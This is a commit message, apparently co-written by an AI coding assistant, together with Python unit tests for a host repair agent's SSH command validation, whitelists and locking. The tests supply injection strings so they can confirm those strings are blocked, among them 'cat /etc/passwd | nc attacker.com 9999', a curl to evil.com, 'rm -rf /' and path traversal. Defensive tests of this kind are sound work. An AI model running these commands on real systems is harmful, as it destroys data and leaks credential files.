P0-1: Complete shell metacharacter regex detection
- Enhanced _SHELL_METACHAR_RE to detect: >, <, \n, ${}, $()
- Prevents all shell injection vectors (redirects, variable expansion, newlines)
- Added 5 new validation tests
P0-2: Add shlex.quote() protection for ansible playbook path
- Wraps playbook_path in shlex.quote() before SSH command construction
- Prevents shell injection if path contains special characters
- Applied in _execute_ansible() method
P0-3: Add SSH target host whitelist validation
- Introduces validate_ssh_target_host() function
- Only allows SSH to: 192.168.0.110, 192.168.0.188
- Prevents unauthorized SSH target exploitation
- Added 5 new whitelist validation tests
P0-4: Convert HostRepairAgent to singleton pattern
- Implements __new__() singleton with shared _in_process_locks dict
- Ensures in-process locks persist across multiple auto_repair_service calls
- Previously created new instance per call, making locks ineffective
- Added singleton persistence test
Test Results: 45/45 passing (34 existing + 11 new P0 tests)
All security validations verified via comprehensive unit test coverage.
Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
440 lines
19 KiB
Python
440 lines
19 KiB
Python
"""
|
||
tests/test_host_repair_agent.py
|
||
Host Repair Agent 單元測試
|
||
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
|
||
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
|
||
"""
|
||
import asyncio
|
||
import pytest
|
||
from unittest.mock import AsyncMock, patch
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 HostRepairConfig 路由
|
||
# =============================================================================
|
||
|
||
class TestHostRepairConfig:
|
||
def test_layer_docker_110_routes_to_110(self):
|
||
from src.services.host_repair_agent import get_ssh_config_for_layer
|
||
config = get_ssh_config_for_layer("docker-110")
|
||
assert config["user"] == "wooo"
|
||
assert config["host"] == "192.168.0.110"
|
||
|
||
def test_layer_docker_188_routes_to_188(self):
|
||
from src.services.host_repair_agent import get_ssh_config_for_layer
|
||
config = get_ssh_config_for_layer("docker-188")
|
||
assert config["user"] == "ollama"
|
||
assert config["host"] == "192.168.0.188"
|
||
|
||
def test_layer_systemd_188_routes_to_188(self):
|
||
from src.services.host_repair_agent import get_ssh_config_for_layer
|
||
config = get_ssh_config_for_layer("systemd-188")
|
||
assert config["user"] == "ollama"
|
||
assert config["host"] == "192.168.0.188"
|
||
|
||
def test_unknown_layer_raises(self):
|
||
from src.services.host_repair_agent import get_ssh_config_for_layer
|
||
with pytest.raises(ValueError, match="Unknown layer"):
|
||
get_ssh_config_for_layer("unknown-layer")
|
||
|
||
def test_k8s_layer_raises(self):
|
||
"""k8s layer 不走 SSH,應 raise"""
|
||
from src.services.host_repair_agent import get_ssh_config_for_layer
|
||
with pytest.raises(ValueError, match="kubectl"):
|
||
get_ssh_config_for_layer("k8s")
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 SSH 命令組裝
|
||
# =============================================================================
|
||
|
||
class TestSSHCommandBuilding:
|
||
def test_repair_command_format(self):
|
||
from src.services.host_repair_agent import build_repair_command
|
||
cmd = build_repair_command("sentry")
|
||
assert cmd == "repair:sentry"
|
||
|
||
def test_repair_command_component_sanitized(self):
|
||
"""防止 command injection"""
|
||
from src.services.host_repair_agent import build_repair_command
|
||
with pytest.raises(ValueError, match="Invalid component"):
|
||
build_repair_command("sentry; rm -rf /")
|
||
|
||
def test_repair_command_valid_components(self):
|
||
from src.services.host_repair_agent import build_repair_command
|
||
valid = ["sentry", "harbor", "gitea", "openclaw", "gitea-runner", "alertmanager", "redis", "nginx"]
|
||
for component in valid:
|
||
cmd = build_repair_command(component)
|
||
assert cmd == f"repair:{component}"
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 HostRepairAgent.repair() 路由
|
||
# =============================================================================
|
||
|
||
class TestHostRepairAgent:
|
||
@pytest.mark.asyncio
|
||
async def test_repair_success_returns_ok(self):
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
|
||
agent = HostRepairAgent()
|
||
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
|
||
mock_ssh.return_value = "REPAIR_OK:sentry"
|
||
|
||
result = await agent.repair(layer="docker-110", component="sentry")
|
||
|
||
assert result.success is True
|
||
assert result.component == "sentry"
|
||
assert result.layer == "docker-110"
|
||
mock_ssh.assert_called_once_with(
|
||
host="192.168.0.110",
|
||
user="wooo",
|
||
key_path="/etc/repair-ssh/id_ed25519",
|
||
command="repair:sentry"
|
||
)
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_repair_fail_returns_failure(self):
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
|
||
agent = HostRepairAgent()
|
||
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
|
||
mock_ssh.return_value = "REPAIR_FAIL:harbor:exit_1"
|
||
|
||
result = await agent.repair(layer="docker-110", component="harbor")
|
||
|
||
assert result.success is False
|
||
assert "REPAIR_FAIL" in result.error
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_repair_ssh_timeout_returns_failure(self):
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
|
||
agent = HostRepairAgent()
|
||
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
|
||
mock_ssh.side_effect = asyncio.TimeoutError()
|
||
|
||
result = await agent.repair(layer="docker-110", component="sentry")
|
||
|
||
assert result.success is False
|
||
assert "timeout" in result.error.lower()
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_repair_denied_returns_failure(self):
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
|
||
agent = HostRepairAgent()
|
||
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
|
||
mock_ssh.return_value = "REPAIR_DENIED:unknown_component:badcomponent"
|
||
|
||
result = await agent.repair(layer="docker-110", component="badcomponent")
|
||
|
||
assert result.success is False
|
||
|
||
|
||
# =============================================================================
|
||
# 測試 URI Scheme 解析
|
||
# 2026-04-06 Claude Code: Sprint 3 T1
|
||
# =============================================================================
|
||
|
||
class TestParseUriCommand:
|
||
def test_openclaw_scheme(self):
|
||
from src.services.host_repair_agent import parse_uri_command
|
||
result = parse_uri_command("openclaw://docker-110/sentry")
|
||
assert result.scheme == "openclaw"
|
||
assert result.host_or_layer == "docker-110"
|
||
assert result.payload == "sentry"
|
||
|
||
def test_ansible_scheme(self):
|
||
from src.services.host_repair_agent import parse_uri_command
|
||
result = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
|
||
assert result.scheme == "ansible"
|
||
assert result.host_or_layer == "192.168.0.188"
|
||
assert result.payload == "vacuum_postgres.yml"
|
||
|
||
def test_ssh_scheme(self):
|
||
from src.services.host_repair_agent import parse_uri_command
|
||
result = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
|
||
assert result.scheme == "ssh"
|
||
assert result.host_or_layer == "wooo@192.168.0.110"
|
||
assert result.payload == "docker ps"
|
||
|
||
def test_invalid_scheme_raises(self):
|
||
from src.services.host_repair_agent import parse_uri_command
|
||
with pytest.raises(ValueError, match="Unsupported scheme"):
|
||
parse_uri_command("http://example.com/cmd")
|
||
|
||
def test_missing_payload_raises(self):
|
||
from src.services.host_repair_agent import parse_uri_command
|
||
with pytest.raises(ValueError, match="payload"):
|
||
parse_uri_command("ansible://192.168.0.188/")
|
||
|
||
def test_legacy_format_raises(self):
|
||
from src.services.host_repair_agent import parse_uri_command
|
||
with pytest.raises(ValueError, match="Unsupported scheme"):
|
||
parse_uri_command("docker-110/sentry")
|
||
|
||
|
||
class TestValidateShellSafety:
|
||
def test_safe_command_passes(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
validate_shell_safety("docker ps") # must not raise
|
||
|
||
def test_semicolon_blocked(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("docker ps; rm -rf /")
|
||
|
||
def test_pipe_blocked(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("cat /etc/passwd | nc attacker.com 9999")
|
||
|
||
def test_double_ampersand_blocked(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("ls && curl http://evil.com")
|
||
|
||
def test_command_substitution_blocked(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("echo $(id)")
|
||
|
||
def test_backtick_blocked(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("echo `id`")
|
||
|
||
def test_too_long_blocked(self):
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="too long"):
|
||
validate_shell_safety("a" * 513)
|
||
|
||
|
||
import os
|
||
from unittest.mock import patch, AsyncMock
|
||
|
||
|
||
class TestAnsibleWhitelist:
|
||
def test_allowed_playbook_passes(self):
|
||
from src.services.host_repair_agent import validate_ansible_playbook
|
||
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}):
|
||
validate_ansible_playbook("vacuum_postgres.yml") # must not raise
|
||
|
||
def test_disallowed_playbook_raises(self):
|
||
from src.services.host_repair_agent import validate_ansible_playbook
|
||
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
|
||
with pytest.raises(ValueError, match="not in allowed whitelist"):
|
||
validate_ansible_playbook("evil_script.sh")
|
||
|
||
def test_path_traversal_blocked(self):
|
||
from src.services.host_repair_agent import validate_ansible_playbook
|
||
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
|
||
with pytest.raises(ValueError, match="not in allowed whitelist"):
|
||
validate_ansible_playbook("../../../etc/passwd")
|
||
|
||
|
||
class TestRepairByUri:
|
||
@pytest.mark.asyncio
|
||
async def test_openclaw_scheme_calls_repair(self):
|
||
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
|
||
agent = HostRepairAgent()
|
||
with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc:
|
||
mock_oc.return_value = HostRepairResult(success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry")
|
||
result = await agent.repair_by_uri("openclaw://docker-110/sentry")
|
||
assert result.success is True
|
||
mock_oc.assert_awaited_once_with("docker-110", "sentry")
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_ansible_scheme_calls_ansible(self):
|
||
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
|
||
agent = HostRepairAgent()
|
||
with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as mock_ans, \
|
||
patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
|
||
mock_ans.return_value = HostRepairResult(success=True, layer="ansible", component="vacuum_postgres.yml", output="REPAIR_OK:ansible")
|
||
result = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml")
|
||
assert result.success is True
|
||
mock_ans.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml")
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_ssh_scheme_blocked_without_approval_flag(self):
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
agent = HostRepairAgent()
|
||
result = await agent.repair_by_uri("ssh://wooo@192.168.0.110/docker ps")
|
||
assert result.success is False
|
||
assert "requires_approval" in result.error
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_invalid_uri_returns_failure(self):
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
agent = HostRepairAgent()
|
||
result = await agent.repair_by_uri("bad-format")
|
||
assert result.success is False
|
||
assert "Unsupported scheme" in result.error
|
||
|
||
|
||
class TestAuditLog:
|
||
@pytest.mark.asyncio
|
||
async def test_successful_repair_writes_audit_log(self):
|
||
"""成功修復應寫入 AuditLog 到 DB"""
|
||
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
|
||
from unittest.mock import patch, AsyncMock
|
||
|
||
agent = HostRepairAgent()
|
||
|
||
with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \
|
||
patch.object(agent, "_write_audit_log", new_callable=AsyncMock) as mock_audit:
|
||
|
||
mock_oc.return_value = HostRepairResult(
|
||
success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry"
|
||
)
|
||
|
||
result = await agent.repair_by_uri("openclaw://docker-110/sentry")
|
||
|
||
assert result.success is True
|
||
assert mock_audit.called, "AuditLog should be called"
|
||
call_kwargs = mock_audit.call_args
|
||
assert call_kwargs is not None
|
||
|
||
|
||
class TestRepairLock:
|
||
@pytest.mark.asyncio
|
||
async def test_duplicate_repair_is_blocked(self):
|
||
"""同一個 component 的修復,第二次呼叫應被 lock 阻擋"""
|
||
import asyncio
|
||
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
|
||
from unittest.mock import AsyncMock, patch
|
||
agent = HostRepairAgent()
|
||
|
||
call_count = 0
|
||
|
||
async def fake_execute_openclaw(layer, component):
|
||
nonlocal call_count
|
||
call_count += 1
|
||
await asyncio.sleep(0.1) # simulate work
|
||
return HostRepairResult(success=True, layer=layer, component=component, output="REPAIR_OK:test")
|
||
|
||
with patch.object(agent, "_execute_openclaw", side_effect=fake_execute_openclaw):
|
||
results = await asyncio.gather(
|
||
agent.repair_by_uri("openclaw://docker-110/sentry"),
|
||
agent.repair_by_uri("openclaw://docker-110/sentry"),
|
||
return_exceptions=True,
|
||
)
|
||
|
||
successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
|
||
blocked = [r for r in results if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error]
|
||
assert len(successes) == 1
|
||
assert len(blocked) == 1
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_singleton_lock_persistence(self):
|
||
"""P0-4: 測試 singleton 模式確保 in-process lock 跨 instance 共享"""
|
||
import asyncio
|
||
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
|
||
from unittest.mock import AsyncMock, patch
|
||
|
||
# Create two instances (should be the same object due to singleton)
|
||
agent1 = HostRepairAgent()
|
||
agent2 = HostRepairAgent()
|
||
|
||
assert agent1 is agent2, "HostRepairAgent should be singleton"
|
||
assert agent1._in_process_locks is agent2._in_process_locks, "Locks dict should be shared"
|
||
|
||
call_count = 0
|
||
|
||
async def fake_execute(layer, component):
|
||
nonlocal call_count
|
||
call_count += 1
|
||
await asyncio.sleep(0.05)
|
||
return HostRepairResult(success=True, layer=layer, component=component, output="OK")
|
||
|
||
# Use agent1 and agent2 in concurrent calls
|
||
with patch.object(agent1, "_execute_openclaw", side_effect=fake_execute):
|
||
results = await asyncio.gather(
|
||
agent1.repair_by_uri("openclaw://docker-110/test"),
|
||
agent2.repair_by_uri("openclaw://docker-110/test"),
|
||
return_exceptions=True,
|
||
)
|
||
|
||
successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
|
||
blocked = [r for r in results if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error]
|
||
|
||
assert len(successes) == 1, "First call should succeed"
|
||
assert len(blocked) == 1, "Second call should be blocked by shared lock"
|
||
|
||
|
||
# =============================================================================
|
||
# P0-1 Tests: Enhanced shell metacharacter detection
|
||
# =============================================================================
|
||
|
||
class TestEnhancedShellMetacharDetection:
|
||
"""2026-04-06 Claude Code: Sprint 3 P0-1 Tests"""
|
||
|
||
def test_redirect_out_blocked(self):
|
||
"""P0-1: > 重導向應被阻擋"""
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("ls > /tmp/out")
|
||
|
||
def test_redirect_in_blocked(self):
|
||
"""P0-1: < 重導向應被阻擋"""
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("cat < /etc/passwd")
|
||
|
||
def test_newline_blocked(self):
|
||
"""P0-1: Newline 換行應被阻擋(允許多行命令)"""
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("ls\nrm -rf /")
|
||
|
||
def test_dollar_brace_substitution_blocked(self):
|
||
"""P0-1: ${ 變數擴展應被阻擋"""
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
with pytest.raises(ValueError, match="Shell metacharacter"):
|
||
validate_shell_safety("echo ${PATH}")
|
||
|
||
def test_safe_simple_command_passes(self):
|
||
"""P0-1: 簡單命令應通過"""
|
||
from src.services.host_repair_agent import validate_shell_safety
|
||
validate_shell_safety("docker ps") # must not raise
|
||
|
||
|
||
# =============================================================================
|
||
# P0-3 Tests: SSH target host whitelist
|
||
# =============================================================================
|
||
|
||
class TestSSHTargetWhitelist:
|
||
"""2026-04-06 Claude Code: Sprint 3 P0-3 Tests"""
|
||
|
||
def test_allowed_host_110_passes(self):
|
||
"""P0-3: 192.168.0.110 在白名單應通過"""
|
||
from src.services.host_repair_agent import validate_ssh_target_host
|
||
validate_ssh_target_host("192.168.0.110") # must not raise
|
||
|
||
def test_allowed_host_188_passes(self):
|
||
"""P0-3: 192.168.0.188 在白名單應通過"""
|
||
from src.services.host_repair_agent import validate_ssh_target_host
|
||
validate_ssh_target_host("192.168.0.188") # must not raise
|
||
|
||
def test_unauthorized_host_blocked(self):
|
||
"""P0-3: 非白名單的主機應被阻擋"""
|
||
from src.services.host_repair_agent import validate_ssh_target_host
|
||
with pytest.raises(ValueError, match="not in allowed whitelist"):
|
||
validate_ssh_target_host("192.168.0.999")
|
||
|
||
def test_localhost_blocked(self):
|
||
"""P0-3: localhost 應被阻擋"""
|
||
from src.services.host_repair_agent import validate_ssh_target_host
|
||
with pytest.raises(ValueError, match="not in allowed whitelist"):
|
||
validate_ssh_target_host("127.0.0.1")
|
||
|
||
@pytest.mark.asyncio
|
||
async def test_ssh_scheme_with_unauthorized_host_fails(self):
|
||
"""P0-3: ssh:// URI 指向未授權主機應失敗"""
|
||
from src.services.host_repair_agent import HostRepairAgent
|
||
agent = HostRepairAgent()
|
||
result = await agent.repair_by_uri("ssh://wooo@192.168.0.999/ls", approved=True)
|
||
assert result.success is False
|
||
assert "not in allowed whitelist" in result.error
|